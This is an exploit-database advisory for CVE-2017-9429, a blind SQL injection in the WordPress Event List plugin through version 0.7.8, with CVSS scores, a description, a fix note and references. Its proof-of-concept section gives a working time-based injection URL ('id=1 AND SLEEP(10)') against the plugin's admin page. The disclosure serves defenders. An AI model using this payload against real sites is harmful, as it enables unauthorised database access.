WordPress Plugin Event List < 0.7.8 - SQL Injection

2017-06-0400:00:00

Dimitrios Tsagkarakis

www.exploit-db.com

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

9 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

46.8%

JSON

# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
# Date: 04-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu 
# Software Link: https://wordpress.org/plugins/event-list/
# Version: 0.7.8
# CVE : CVE-2017-9429
# Category: webapps

 

1. Description:

   

SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php. 

 

2. Proof of Concept:

 

http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id
=1 AND SLEEP(10)

 

3. Solution:

   

The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.

 

4. Reference:

 

http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
ction-sqli/

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429